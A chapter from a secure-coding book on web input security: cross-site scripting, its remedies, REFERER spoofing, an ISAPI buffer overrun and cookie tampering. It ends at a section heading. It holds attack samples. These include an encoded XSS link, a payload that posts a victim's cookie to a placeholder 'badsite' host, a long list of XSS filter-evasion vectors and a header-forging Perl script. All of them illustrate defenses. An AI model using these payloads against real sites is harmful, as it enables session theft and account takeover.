Chapter 13. Web-Specific Input Issues

It’s now time to turn our attention to what is potentially the most hostile of all environments: the Web. In this chapter, I’ll focus on making sure that applications that use the Web as a transport mechanism are safe from attack. I’m assuming you’ve read Chapter 10 and Chapter 11, before reading this, and if you use a database as part of your Web-based application, you should also read Chapter 12.

Virtually all Web applications perform some action based on user requests. Let’s be honest: a Web-based service that doesn’t take user input is probably worthless! Remember that you should determine what data is valid and reject all other input. I know I sound like a broken record, but data verification is probably the most important discipline to understand when building secure applications.

In this chapter, I’ll focus on cross-site scripting issues (mainly because they are so prevalent) and HTTP trust issues and I’ll offer an explanation of which threats that Secure Sockets Layer (SSL) and Transport Layer Security (TLS) help to resolve. So let’s get started with the attack du jour: cross-site scripting.

Cross-Site Scripting: When Output Turns Bad

I often hear people say that cross-site scripting (XSS) issues are the most difficult attacks to explain to end users and yet they are among the easiest to exploit. I think what makes them hard to understand is the nature of the attack: the client is compromised because of a flaw in one or more Web pages. About three years ago, no one had heard of cross-site scripting issues, but now I think it’s safe to say we hear of at least one or two issues per day on the Web. So, what is the problem and why is it serious? The problem is twofold:

  • A Web site trusts input from an external, untrusted entity.

  • The Web site displays said input as output.

I bet you’ve seen ASP code like this before:

Hello,  
<%
   Response.Write(Request.Querystring("name"))
%>

This code will write out to the browser whatever is in the name field in the QueryString—for example, www.contoso.com/req.asp?name=Blake. That seems okay, but what if an attacker can convince a user to click on this link, for example on a Web page, a newsgroup or an e-mail message? That doesn’t seem like a big deal, until you realize that an attacker could have the unsuspecting user click on the link in this code:

<a href=www.contoso.com/req.asp?name=scriptcode>
    Click here to win $1,000,000</a>

where the scriptcode block is this:

<script>x=document.cookie;alert(x);</script>

Note that the payload normally would not look like this—it’s too easy for the victim to realize that something is amiss, instead, the attacker will encode most of the payload to yield this:

<a href="http://www.microsoft.com@%77%77%77%2E%65%78%70%6C%6F%72%61%74%69
%6F%6E%61%69%72%2E%63%6F%6D%2F%72%65%71%2E%61%73%70%3F%6E%61%6D%65%3D%3C
%73%63%72%69%70%74%3E%78%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B
%61%6C%65%72%74%28%78%29%3B%3C%2F%73%63%72%69%70%74%3E">
    Click here to win $1,000,000</a>

Notice two aspects about this. First, the link looks like it goes to www.microsoft.com, but it does not! It uses a little-known, but valid, URL format: http://username:password@webserver. This is defined in RFC 1738, "Uniform Resource Locators (URL)," at ftp://ftp.isi.edu/in-notes/rfc1738.txt. The most relevant text, from "3.1. Common Internet Scheme Syntax," reads like this:

While the syntax for the rest of the URL may vary depending on the particular scheme selected, URL schemes that involve the direct use of an IP-based protocol to a specified host on the Internet use a common syntax for the scheme-specific data: //<user>:<password>@<host>:<port>/<url-path>.

Note that each part of the URL is optional. Now look at the URL again: the www.microsoft.com reference is bogus. It’s not the real URL whatsoever. It’s a username, followed by the real Web site name, and it is hex-encoded to make it harder for the victim to determine what the real request is for!

OK, back to the XSS issue. The problem is the name parameter—it’s not a name, but rather HTML and JavaScript, which could be used to access user data, such as the user’s cookie through the document.cookie object. As you may know, cookies are tied to a domain; for example, a cookie in the contoso.com domain can be accessed only by Web pages in that domain. For example, a Web page in the microsoft.com domain cannot access a cookie in the contoso.com domain. Now think for a moment; when the user clicks the link above, in what domain does the script code execute? To answer this, simply ask yourself this question, "Where did the page come from?" The page came from the contoso.com domain, so it can access the cookie data in the contoso.com domain. The problem is that only one page in a domain needs to have this kind of flaw to render all data on a client computer tied to that domain insecure. This code does nothing more than display the cookie in the user’s browser. Of course, an attacker can do more harm, but I’ll cover that later.

Let me put this in perspective. In late 2001, a vulnerability was discovered in a Web page in the passport.com domain that had a very subtle flaw similar to the example above. By sending a Hotmail recipient a specially crafted e-mail, the attacker could cause script to execute in the passport.com domain because Hotmail is in the hotmail.passport.com domain. And this means the code could access the cookies generated by the Passport service used to authenticate the client. When the attacker replayed those cookies—remember that a cookie is just a header in the HTTP request—he could spoof the e-mail recipient and access data that only that recipient could normally access.

Through cross-site scripting attacks, cookies can be read or changed. This is also called poisoning; browser plug-ins or native code tied to a domain (for example, using the SiteLock ActiveX template, discussed in Chapter 16) can be instantiated and scripted with untrusted data and user input can be intercepted. In short, the attacker has unfettered access to the browser’s object model in the security context of the compromised domain.

A more insidious attack is Web server spoofing. Imagine that a news site has an XSS flaw. Using that flaw, the attacker has full access to the object model in the security context of the news site, so if the attacker can get a victim to navigate to the Web site, he can display a news article that comes from the attacker’s site yet appears to originate from the news site’s Web server.

Figure 13-1 should help outline the attack.

How XSS attacks work.

Figure 13-1. How XSS attacks work.

More Information

The real reason XSS issues exist is because data and code are mixed together. Refer to "Don’t Mix Code and Data" in Chapter 3, for more detail about this insecure design issue.

Any Web browser supporting scripting is potentially vulnerable. Furthermore, data gathered by the malicious script can be sent back to the attacker’s Web site. For example, if the script has used the Dynamic HTML (DHTML) object model to extract data from a page, a cross-site scripting attack can send the data to the attacker. Look at this example to see what I mean:

<a href=http://www.contoso.com/req.asp?name=
  <FORM action=http://www.badsite-sample-13.com/data.asp 
       method=post id="idForm">
       <INPUT name="cookie" type="hidden"> 
  </FORM>
  <SCRIPT>
    idForm.cookie.value=document.cookie; 
    idForm.submit();
  </SCRIPT> >
Click here!
</a>

Note that normally this HTML code is escaped; I just broke it out in an unescaped form to make it readable. When the user clicks the link, the user’s cookie is sent to another Web site.

Important

Using SSL/TLS does not mitigate cross-site scripting issues.

XSS attacks can be used against machines behind firewalls. Many corporate local area networks (LANs) are configured such that client machines trust servers on the LAN but do not trust servers on the outside Internet. However, a server outside a firewall can fool a client inside the firewall into believing that a trusted server inside the firewall has asked the client to execute a program. All the attacker needs is the name of a Web server inside the firewall that does not validate data in a Web page. (This Web server could be using a form field or querystring.) Finding such a server isn’t easy unless the attacker has some inside knowledge, but it is possible.

XSS attacks can be persisted via cookies if an XSS bug exists in a site that outputs data from cookies onto a page. To pull this off, the attacker simply infects the cookie with malicious script, and each time the victim goes back to that site, the script in the cookie is displayed, the malicious code runs, and the attack is persistent until the user removes the cookie.

More Information

A wonderful explanation of XSS issues is also available in "Cross-Site Scripting Overview" at http://www.microsoft.com/technet/itsolutions/security/topics/csoverv.asp. And a great resource is the Open Web Application Security Project at http://www.owasp.org.

Sometimes the Attacker Doesn’t Need a <SCRIPT> Block

Sometimes, the user-supplied data is inserted in a script block. In this case, it’s not necessary for the attacker to include the <script> tag because it’s already provided by the Web site developer. However, it does mean that the result must be valid script syntax.

You should be aware that <img src> and <a href> tags can also point to script code, not just a "classic" URL. For example, the following is a valid anchor:

<a href="javascript:alert(1);">Click here to win $1,000,000!</a>

No script block here!

The Attacker Doesn’t Need the User to Click a Link!

I know you’re thinking, "But the user has to click a link to get this to happen." Luckily for the attackers, some attacks can be automated and require little or no user interaction. The easiest attack to pull off is when the input in the querystring, form, or some other data is used to build part of an HTML tag. For example, imagine the user’s input builds this:

<a href=<%= request.querystring("url")%>>Click Here</a>

What’s wrong with this? The attacker could provide the following in the URL variable in the querystring:

http://www.microsoft.com onmouseover="malicious-script"

This will add a mouseover event to the resulting HTML output. Now the user simply needs to move the mouse over the anchor text, and the exploit script will work. The more astute among you will realize that many tags can include onload or onactivate events. The attack could happen with no user interaction. Need I say more?

Other XSS-Related Attacks

You should be aware of three subtle variations to the "classic" XSS attack: accessing an HTML file installed on the local computer; accessing HTML-like files, such as Windows Help files (CHM files); and accessing HTML resources. Let’s look at each.

XSS Attacks Against Local Files

The concept of XSS attacks against Web sites, while a mystery to some, is relatively well-known in the security community. What are not so well-known are XSS attacks against HTML files on a user’s computer. Local content is vulnerable to attack if the file location is predictable and it outputs input from the user. Web browsers download cacheable content to random directories on the client computer. For example, on one of my computers, the files are loaded into directories with names like CLYBG5EV, KDEJ41EB, ONWNWXYR, and W5U7GT63 (generated using CryptGenRandom!) This makes it very hard for an attacker to determine the location of the files. However, HTML files installed as part of a product installation are often placed in predictable locations, and it is this consistency that aids an attacker.

Generally, the attack happens because an HTML page takes data from a URL and uses that to build output. Take a look at this example—imagine it’s named localxss.html and it’s loaded in a directory named c:webfiles:

<html>
    <head>
        <title>Local XSS Test</title>
    </head>
    <body>
        Hello! &nbsp;
        <script>document.write(location.hash)</script>
    </body>
</html>

This code will echo back onto the Web page whatever is after the hash symbol (#) in the URL.

The following link will display a dialog box that simply says "Hi!" if the user clicks it:

file://C:webfileslocalxss.html#<script>alert(''Hi!'),</script>

This attack is a little more insidious than simply popping up a dialog box. This code now runs in the My Computer zone. (Microsoft Internet Explorer includes the notion of zones. See the coming sidebar, "Understanding Zones," for more information.) If code can come from the Internet, it’s in the Internet zone by default, but when the unsuspecting user clicks the link, the file is actually in the highly trusted My Computer zone. From an Internet Explorer perspective, this is an elevation of privilege attack.

The same issues apply to the location.search and location.href properties.

Note

Note that these attacks apply to all browsers; however, it’s only in Internet Explorer that an attack can include the notion of transgressing zones, because only Internet Explorer has zones. Attacks against local content are less of an issue in Internet Explorer 6 SP1, Microsoft Windows XP SP1, and Microsoft Windows .NET Server 2003 because navigation from the Internet zone to the My Computer zone is blocked.

Look again at Figure 13-1, replace the Internet Web server with an Intranet server, and you’ll understand this threat a little better!

HTML Help Files

HTML Help files are also potentially vulnerable to local XSS attacks. HTML Help files are a collection of HTML files compiled with the CHM file extension. You can create and decompile CHM files with Microsoft HTML Help Workshop. The attack is mounted by using the mk: protocol handler rather than http:. Treat any CHM files you create as potential XSS vulnerabilities. The same applies to any HTML document that has a non-HTML extension.

XSS Attacks Against HTML Resources

A little more obscure but still worthy of comment is accessing HTML through resources. Internet Explorer supports the res: protocol, which provides the ability to extract and display resources (such as text messages, images, or HTML files) from a dynamic-link library (DLL), EXE files, or other binary images. For example, res://mydll.dll/#23/ERROR will extract the HTML (#23) resource named ERROR from mydll.dll and display it. If ERROR takes input from the URL and displays that, you might have an XSS issue. This means you should treat resource HTML data just like a local HTML file.

More Information

Microsoft issued a security bulletin fixing some resource-based XSS issues in March 2002; see "28 March 2002 Cumulative Patch for Internet Explorer" at http://www.microsoft.com/technet/security/bulletin/MS02-015.asp for more information.

Remember that the Windows shell, Windows Explorer, supports the res: protocol to extract and display resources from a DLL. Therefore, you must make sure any HTML resources you include are devoid of XSS issues.

XSS Remedies

As with all user input issues, the first rule for mitigating XSS issues is to determine which input is valid and to reject all other input. (Have I said that enough times?) I’m not going to spend much time on this because this topic has been discussed ad nauseam in the previous three chapters. That said, not trusting the input is the only safe approach. Fixing XSS issues is a little like fixing SQL injection attacks—you have a hugely complex grammar to deal with, and certain characters have special meaning.

Other defense in depth mechanisms do exist, and I’ll discuss some of these, including the following:

  • Encoding output

  • Adding double quotes around all tag properties

  • Inserting data in the innerText property

  • Forcing the codepage

  • The Internet Explorer 6.0 SP1 HttpOnly cookie option

  • Internet Explorer "Mark of the Web"

  • Internet Explorer <FRAME SECURITY> attribute

  • ASP.NET 1.1 ValidateRequest configuration option

You should think of all these items except the first as defense in depth strategies because, frankly, there is only one way to solve the issue, and that’s for the server application to be hard-core about what constitutes valid input. Let’s look at each of these.

Encoding Output

Encoding the input data before displaying it is a good practice. Luckily, this is simple to achieve using the ASP Server.HTMLEncode method or the ASP.NET HttpServerUtility.HTMLEncode method. These methods will convert dangerous symbols, including HTML tags, to their harmless HTML representation—for example, < becomes &lt;.

Adding Double Quotes Around All Tag Properties

Sometimes the attacker’s data becomes part of an HTML tag; in fact, it’s very common. For example, www.contoso.com/product.asp?id=210502 executes this ASP code:

<a href=http://www.contoso.com/detail.asp?id=<%= request.querystring("id") %>>

which yields the following HTML:

<a href=http://www.contoso.com/detail.asp?id=2105>

Exploiting this requires that the attacker provide an id value that closes the <a> tag and creates a <script> tag, This is very easy—simply make id equal to 2105><script event=onload>exploitcode</script>.

In some cases, the attacker need not close the <a> tag; he can extend the properties of the tag. For example, 2105 onclick="exploitcode" would extend the <a> tag to include an onclick event, and when the user clicks the link, the exploit code executes.

The Web developer can defend against this attack by placing optional double quotes around each tag attribute, like so:

<a href="http://www.contoso.com/detail.asp?id=<%= Server.HTMLEncode (request.querystring("id")) %>">

Note the double quotes around the href reference. It doesn’t matter if the attacker provides a malformed id value, because detail.asp will treat the entire input—not simply the first value that constitutes a valid id—as the id. For example, 2105 onclick='exploitcode' becomes this:

<a href="http://www.contoso.com/detail.asp?2105 onclick=‘exploitcode’">

I doubt 2105 onclick='exploitcode' is a valid product at Contoso.

So why not use single quotes rather than double quotes? The reason is HTML encoding doesn’t escape single quote characters, but it does escape double quotes.

Inserting Data in the innerText Property

The innerText property renders arbitrary content inert and is safe to use when building content based on any user input. The following shows a simple example:

<html>
  <body>
    <span id=spnTest></span>
  </body>
</html>
<script for=window event=onload>
    spnTest.innerText = location.hash;
</script>

If you invoke this HTML code with the following URL, you’ll notice the script is rendered inert.

file://C:webfiles/xss.html#<script>alert(1);</script>

The innerHTML property is actively discouraged when populating a page with untrusted input. I’m sure you can work out why!

Forcing the Codepage

If your Web application restricts what is valid in a client request, it should also limit other representations of those characters. Setting a codepage, such as by using the following <meta> tag, in your Web pages will protect against the attacker using canonicalization tricks that could represent special characters using multibyte escapes:

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

This character set contains all characters necessary to type Western European languages. This encoding is also the most common encoding used on the Internet. It supports the following languages: Afrikaans, Catalan, Danish, Dutch, English, Faeroese, Finnish, French, German, Galician, Irish, Icelandic, Italian, Norwegian, Portuguese, Spanish, and Swedish. For completeness, ISO-8859 supports the following languages:

  • 8859-2 Eastern Europe

  • 8859-3 South Eastern Europe

  • 8859-4 Scandinavia (mostly covered by 8859-1)

  • 8859-5 Cyrillic

  • 8859-6 Arabic

  • 8859-7 Greek

  • 8859-8 Hebrew

The Internet Explorer 6.0 SP1 HttpOnly Cookie Option

During the Windows Security Push, the Internet Explorer security team devised a way to protect the browser from XSS attacks that read the client’s cookie from script. The remedy is to add an HttpOnly option to the cookie. For example, the following cookie cannot be accessed by DHTML in Internet Explorer 6.0 SP1:

Set-Cookie: name=Michael; domain=Microsoft.com; HttpOnly

The browser will simply return an empty string if the insecure script code originating from the server attempts to read the document.cookie property. You can use the following ISAPI filter code, available in the download code, if you want to enforce this option for all cookies used by your Internet Information Services (IIS)–based Web servers.

// Portion of HttpOnly ISAPI filter code
DWORD WINAPI HttpFilterProc(
   PHTTP_FILTER_CONTEXT pfc,
   DWORD dwNotificationType,
   LPVOID pvNotification) {

   // Hard code cookie length to 2k
   CHAR szCookie[2048];
   DWORD cbCookieOriginal = sizeof(szCookie) / sizeof(szCookie[0]);
   DWORD cbCookie = cbCookieOriginal;

      HTTP_FILTER_SEND_RESPONSE *pResponse = 
         (HTTP_FILTER_SEND_RESPONSE*)pvNotification;

      CHAR *szHeader = "Set-Cookie:";
      CHAR *szHttpOnly = "; HttpOnly";
      if (pResponse->GetHeader(pfc,szHeader,szCookie,&cbCookie)) {
         if (SUCCEEDED(StringCchCat(szCookie,
                                    cbCookieOriginal,
                                    szHttpOnly))) {
            if (!pResponse->SetHeader(pfc,
                                      szHeader,
                                      szCookie)) {
                        // Fail securely - send no cookie!
                        pResponse->SetHeader(pfc,szHeader,"");
               }
            } else {
               pResponse->SetHeader(pfc,szHeader,"");
          }
   }

   return SF_STATUS_REQ_NEXT_NOTIFICATION;
}

You can perform a similar task in ASP.NET:

HttpCookie cookie = new HttpCookie("Name", "Michael");
cookie.Path = "/; HttpOnly";
Response.Cookies.Add(cookie);

This will set the HttpOnly option to a single cookie in the application; you can make the setting application-global by hooking the Application_OnPreSendRequestHeaders method in global.asax.

Likewise, you can use code like this in an ASP page:

response.addheader("Set-Cookie","Name=Mike; path=/; HttpOnly; Expires=" + CStr(Now))

Caution

Although HttpOnly is a good defense in depth mechanism, it does not defend against cookie-poisoning attacks; it only prevents malicious script from reading the cookie. Enabling this option in your cookies is not a complete solution.

Internet Explorer "Mark of the Web"

Earlier I mentioned the problem of XSS issues in local HTML files. Internet Explorer allows you to force HTML files into a zone other than the My Computer zone. This feature, available since Internet Explorer 4.0, is often referred to as "the mark of the Web," and you may have noticed it if you saved a Web page from the Internet onto your desktop. Look at Figure 13-2. This was captured from msdn.microsoft.com and saved locally, yet the zone is not My Computer—it’s in the Internet zone, because that’s where the HTML pages came from.

The MSDN homepage saved locally, yet it’s in the Internet zone, not the My Computer zone.

Figure 13-2. The MSDN homepage saved locally, yet it’s in the Internet zone, not the My Computer zone.

The secret to this is a comment placed in the file:

<!-- saved from url=(0026)http://msdn.microsoft.com/ -->

When Internet Explorer loads this file, it looks for a "saved from url" comment, and then it reads the URL and uses the zone settings on the computer to determine what security policy to apply to the Web page. If your policy prohibits certain functionality in the Internet zone (scripting, for example) but allows it in the My Computer zone, this Web page cannot use script because it has been forced into the Internet zone. The (0026) value is the string length of the URL.

You should set such a comment in your Web pages linking back to your Web site. That way the more restrictive policy is always enforced, regardless of how the Web page is accessed. This also applies to local HTML content—setting this option can force local HTML files into a more secure zone.

Internet Explorer <FRAME SECURITY> Attribute

Internet Explorer 6 and later introduced a new <FRAME> attribute to prohibit dangerous content in pages loaded into frames. The SECURITY attribute applies the user’s zone settings to the source file of a frame or iframe. The following example outlines how to use this property:

<IFRAME SECURITY="restricted" src="http://www.contoso.com"></IFRAME>

This will force the Web site into the Restricted Sites zone, where by-default script cannot execute. Actually, not a great deal of functionality is available to a Web site in the Restricted Sites zone! If a frame is restricted by the SECURITY attribute, all nested frames share the same restrictions.

You should consider wrapping your Web site pages in a frame and using this attribute if there are ways to work around other defensive mechanisms. Obviously, this only protects uses of Internet Explorer, and not other browsers.

More Information

Presently, the only valid <FRAME SECURITY> setting is ‘restricted’.

ASP.NET 1.1 ValidateRequest configuration option

Before I explain this new ASP.NET 1.1 capability, you should realize that this does not solve the XSS problem; rather it helps reduce the chance that you accidentally leave an XSS defect in your ASP.NET code. Nothing more! By default, this option is enabled, and you should leave it that way until you are happy you have fixed all potential XSS vulnerabilities in your code. Even then I’d leave it turned on as a small insurance policy!

By default, this feature will check that users are not attempting to set HTML or script in cookies (HttpRequest.Cookies), query strings (HttpRequest.QueryString) and HTML forms (HttpRequest.Form.) If the request contains this potentially dangerous input an HttpRequestValidationException exception is thrown.

You can set the option as a page directive:

<%@ ValidateRequest="False" %>

or in a configuration file:

<!-- configuration snippet:
     can be in machine.config or a web.config
     can be scoped to an individual page using <location> around
     the <system.web> element
-->
<configuration>
  <system.web> 
     <pages validateRequest="true"/>
  </system.web>
</configuration> 

Remember, the default is true and all requests are validated, so you must actively disable this feature.

Don’t Look for Insecure Constructs

A common mistake made by many Web developers is to allow "safe" HTML constructs—for example, allowing a user to send <IMG> or <TABLE> tags to the Web application. Then the user can send HTML tags but nothing else, other than plaintext. Do not do this. A cross-site scripting danger still exists because the attacker can embed script in some of these tags. Here are some examples:

  • <img src=javascript:alert([code])>

  • <link rel=stylesheet href="javascript:alert(([code])">

  • <input type=image src=javascript:alert(([code])>

  • <bgsound src=javascript:alert(([code])>

  • <iframe src="javascript:alert(([code])">

  • <frameset onload=vbscript:msgbox(([code])></frameset>

  • <table background="javascript:alert(([code])"></table>

  • <object type=text/html data="javascript:alert(([code]);"></object>

  • <body onload="javascript:alert(([code])"></body>

  • <body background="javascript:alert(([code])"></body>

  • <p style=left:expression(alert(([code]))>

A list provided to http://online.securityfocus.com/archive/1/272037 goes further:

  • <a href="javas&#99;ript&#35;[code]">

  • <div onmouseover="[code]">

  • <img src="javascript:[code]">

  • <img dynsrc="javascript:[code]">

  • <input type="image" dynsrc="javascript:[code]">

  • <bgsound src="javascript:[code]">

  • &<script>[code]</script>

  • &{[code]};

  • <img src=&{[code]};>

  • <link rel="stylesheet" href="javascript:[code]">

  • <iframe src="vbscript:[code]">

  • <img src="mocha:[code]">

  • <img src="livescript:[code]">

  • <a href="about:<s&#99;ript>[code]</script>">

  • <meta http-equiv="refresh" content="0;url=javascript:[code]">

  • <body onload="[code]">

  • <div style="background-image: url(javascript:[code]);">

  • <div style="behaviour: url([link to code]);">

  • <div style="binding: url([link to code]);">

  • <div style="width: expression([code]);">

  • <style type="text/javascript">[code]</style>

  • <object classid="clsid:..." codebase="javascript:[code]">

  • <style><!--</style><script>[code]//--></script>

  • <![CDATA[<!--]]><script>[code]//--></script>

  • <!-- -- --><script>[code]</script><!-- -- -->

  • <<script>[code]</script>

  • <img src="blah"onmouseover="[code]">

  • <img src="blah>" onmouseover="[code]">

  • <xml src="javascript:[code]">

  • <xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>

  • <div datafld="b" dataformatas="html" datasrc="#X"></div>

  • [xC0][xBC]script>[code][xC0][xBC]/script>

Not all browsers support all these constructs. Some are specific to Internet Explorer, Navigator, Mozilla, and Opera, and some are generic. Bear in mind that the two lists are by no means complete. I have no doubt there are other subtle ways to inject script into HTML.

Another mistake I’ve seen involves converting all input to uppercase to thwart JScript attacks, because JScript is primarily lowercase and case-sensitive. And what if the attacker uses Microsoft Visual Basic Scripting Edition (VBScript), which is case-insensitive, instead? Don’t think that stripping single or double quotes will help either—many script and HTML constructs take arguments without quotes.

Or how about this: you strip out jscript:, vbscript: and javascript: tags? And as you may have noted from the list above, Netscape Navigator also supports livescript: and mocha: and the somewhat obtuse &{} syntax!

In summary, you should be strict about what is valid user input, and you should make sure the regular expression does not allow HTML in the input, especially if the input might become output for other users. You must do this because you cannot know all potential exploits.

But I Want Users to Post HTML to My Web Site!

Sometimes you simply want to allow a small subset of HTML tags so that your users can add some formatting to their comments. The idea of accepting HTML from untrusted sources is highly discouraged because it’s extremely difficult to get it right. Allowing tags like <EM>, <PRE>, <BR>, <P>, <I>…</I>, and <B>…</B> is safe, so long as you use regular expressions to look for these character sequences explicitly. The following regular expression will allow some tags, as well as other safe characters:

if (/^(?:[sw?!,.’"]*|(?:</?(?:i|b|p|br|em|pre)>))*$/i) {
    # Cool, it’s valid input!
}

This regular expression will allow spaces (s), A-Za-z0-9 and "_" (w), a limited subset of punctuation and "<" followed by an optional "/", and the letter or letters i, b, p, pr, em, or pre followed by a ">". The i at the end of the expression makes the check case-insensitive. Note that this regular expression does not validate that the input is well-formed HTML. For example, Hello, </i>World!<i> is legal input to the regular expression, but it is not well-formed HTML even though the tags are not malicious.

Caution

Be careful when accepting HTML input. It can lead to compromise unless the solution is bulletproof. This issue became so bad for the distributed crypto-cracking site http://www.distributed.net that they took radical action in January 2002. You can read about the issues they faced and their remedy at http://n0cgi.distributed.net/faq/cache/268.html. By the way, the URL starts with n-zero-cgi.

How to Review Code for XSS Bugs

Here’s a simple four-step program for getting out of XSS issues:

  1. Write down all the entry points to your Web application. Remember that this includes fields in forms, querystrings, HTTP headers, cookies, and data from databases.

  2. Trace each datum as it flows through the application.

  3. Determine whether the datum is ever reflected to output.

  4. If it is reflected to output, is it clean and sanitized?

And obviously, if you find an uninspected datum that is echoed you should pass it through a regular expression or some other sanity-checking code that looks for good things (not bad things) and then encode the output if you have any doubts. If your regular expression fails to confirm the validity of the data, you should dispose of the request.

You should also review error message pages—they have proved a target-rich environment in the past.

Finally, pay special attention to client code that uses innerHTML and document.write.

More Information

Another example of the "don’t trust user input" Web-based attack is the HTML Form Protocol Attack, which sends arbitrary data to another server by using the Web server as an attack vector. A paper outlining this attack is at http://www.remote.org/jochen/sec/hfpa/hfpa.pdf.

Other Web-Based Security Topics

This section outlines common security mistakes I’ve seen in Web-based applications over the past few years. It’s important to note that many of these issues apply to both Microsoft and non-Microsoft solutions.

eval() Can Be Bad

You have a serious security flaw if you create server-side code that calls the JavaScript eval function (or similar) and the input to the function is determined by the attacker. JavaScript eval makes it possible to pass practically any kind of code to the browser, including multiple JavaScript statements and expressions, and have them executed dynamically. For example, eval("a=42; b=69; document.write(a+b);""); writes 111 to the browser. Imagine the fun an attacker could have if the argument string to eval is derived from a form field and is unchecked!

HTTP Trust Issues

HTTP requests are a series of HTTP headers followed by a content body. Any of this data can be spoofed because there’s no way for the server to verify that any part of the request is valid or, indeed, that it has been tampered with. Some of the most common security mistakes Web developers make include trusting the content of REFERER headers, form fields, and cookies to make security decisions.

REFERER Errors

The REFERER header is a standard HTTP header that indicates to a Web server the URL of the Web page that contained the hyperlink to the currently requested URL. Some Web-based applications are subject to spoofing attacks because they rely on the REFERER header for authentication using code similar to that of this ASP page:

<%
    strRef = Request.ServerVariables("HTTP_REFERER")
    If strRef = "http://www.northwindtraders.com/login.html" Then
        ’ Cool! This page is called from Login.html!
        ’ Do sensitive tasks here.
    End If
%>

The following Perl code shows how to set the REFERER header in an HTTP request and convince the server that the request came from Login.html:

use HTTP::Request::Common qw(POST GET);
use LWP::UserAgent;

$ua = LWP::UserAgent->new();
$req = POST ’http://www.northwindtraders.com/dologin.asp’,
         [   Username => ’mike’,
             Password => ’mypa$w0rd’,
         ];
$req->header(Referer => ’http://www.northwindtraders.com/login.html’);
$res = $ua->request($req);

This code can convince the server that the request came from Login.html, but it didn’t—it was forged! Never make any security decision based on the REFERER header or on any other header, for that matter. HTTP headers are too easy to fake. This is a variation of the oft-quoted "never make a security decision based on the name of something, including a filename" lemma.

Note

A colleague told me he sets up trip wires in his Web applications so that if the REFERER header isn’t what’s expected, he’s notified that malicious action is possibly afoot!

ISAPI Applications and Filters

After performing numerous security reviews of ISAPI applications and filters, I’ve found two vulnerabilities common to such applications: buffer overruns and canonicalization bugs. Both are covered in detail in other parts of this book, but a special case of buffer overruns exists, especially in ISAPI filters. These filters are a special case because in IIS 5 ISAPI filters run in the Inetinfo.exe process, which runs as SYSTEM. Think about it: a DLL accepting direct user input running as SYSTEM can be a huge problem if the code is flawed. Because the potential for damage in such cases is extreme, you must perform extra due diligence when designing, coding, and testing ISAPI filters written in C or C++.

Note

Because of the potential seriousness of running flawed code as SYSTEM, by default, no user-written code runs as SYSTEM in IIS 6.

More Information

An example of an ISAPI vulnerability is the Internet Printing Protocol (IPP) ISAPI buffer overrun. You can read more about this bug at http://www.microsoft.com/technet/security/bulletin/MS01-023.asp.

The buffer overrun issue I want to spell out here is the call to lpECB->GetServerVariable, which retrieves information about an HTTP connection or about IIS itself. The last argument to GetServerVariable is the size of the buffer to copy the requested data into, and like many functions that take a buffer size, you might get it wrong, especially if you’re handling Unicode and ANSI strings. Take a look at this code fragment from the IPP flaw:

TCHAR g_wszHostName[MAX_LEN + 1];

BOOL GetHostName(EXTENSION_CONTROL_BLOCK *pECB) {
    DWORD  dwSize = sizeof(g_wszHostName);
    char   szHostName[MAX_LEN + 1];
    
    //Get the server name.
    pECB->GetServerVariable(pECB->ConnID,
        "SERVER_NAME",
        szHostName, 
        &dwSize);

    //Convert ANSI string to Unicode.
    MultiByteToWideChar(CP_ACP,
        0, 
        (LPCSTR)szHostName, 
        -1, 
        g_wszHostName,
        sizeof (g_wszHostName));

Can you find the bug? Here’s a clue: the code was compiled using #define UNICODE, and TCHAR is a macro. Still stumped? There’s a Unicode/ANSI byte size mismatch; g_wszHostName and szHostName appear to be the same length, MAX_LEN + 1, but they are not. When Unicode is defined during compilation, TCHAR becomes WCHAR, which means g_wszHostName is MAX_LEN + 1 Unicode characters in size. Therefore, dwSize is really (MAX_LEN + 1) * sizeof (WCHAR) bytes, because sizeof(WCHAR) is 2 bytes in Windows. Also, g_wszHostName is twice the size of szHostName, because szHostName is composed of one-byte characters. The last argument to GetServerVariable, dwSize, however, points to a DWORD that indicates that the size of the buffer pointed to by g_wszHostName is twice the size of szHostName, so an attacker can overrun szHostName by providing a buffer larger than sizeof(szHostName). Not only is this a buffer overrun, it’s exploitable because szHostName is the last buffer on the stack of GetHostName, which means it’s right next to the function return address on the stack.

The fix is to change the value of the dwSize variable and use WCHAR explicitly rather than TCHAR:

WCHAR g_wszHostName[MAX_LEN + 1];

BOOL GetHostName(EXTENSION_CONTROL_BLOCK *pECB) {
    char   szHostName[MAX_LEN + 1];
    DWORD  dwSize = sizeof(szHostName);
    
    //Get the server name.
    pECB->GetServerVariable(pECB->ConnID,
        "SERVER_NAME",
        szHostName, 
        &dwSize);

    //Convert ANSI string to Unicode.
    MultiByteToWideChar(CP_ACP,
        0, 
        (LPCSTR)szHostName, 
        -1, 
        g_wszHostName,
        sizeof (g_wszHostName) / sizeof(g_wszHostName[0]));

Two other fixes were added to IIS 6: IPP is off by default, and all users must be authenticated if they want to use the technology once it is enabled.

Some important lessons arise from this bug:

  • Perform more code reviews for ISAPI applications.

  • Perform even more code reviews for ISAPI filters.

  • Be wary of Unicode and ANSI size mismatches, which are common in ISAPI applications.

  • Turn less-used features off by default.

  • If your application accepts direct user input, authenticate the user first. If the user is really an attacker, you have a good idea who he or she is.

Sensitive Data in Cookies and Fields

If you create a cookie for users, you should consider what would happen if the user manipulated data in the cookie. The same applies to hidden fields; just because the field is hidden does not mean the data is protected.

I’ve seen two almost identical examples, one implemented using cookies, the other using hidden fields. In both cases, the developer placed a purchasing discount field in the cookie or the field on the HTML form, and the discount in the cookie or field was applied to the purchase. However, an attacker could easily change a 5 percent discount into a 50 percent discount, and the Web site would honor the value! In the case of the cookie example, the attacker simply changed the file on her hard drive, and in the field example, the attacker saved the source code for the HTML form, changed the hidden field value, and then posted the newly changed form to the Web site.

More Information

A great example of this kind of vulnerability was the Element N.V. Element InstantShop Price Modification vulnerability. You can read about this case at http://www.securityfocus.com/bid/1836.

The first rule is this: don’t store sensitive data in cookies, hidden fields, or in any data that could potentially be manipulated by the user. If you must break the first rule, you should encrypt and apply a message authentication code (MAC) to the cookie or field content by using keys securely stored at the server. To the user, these data are opaque; they should not be manipulated in any way by any entity other than the Web server. It’s your data—you determine what is stored, what the format is, and how it is protected, not the user. You can learn more about MACs in Chapter 6.

Be Wary of "Predictable Cookies"

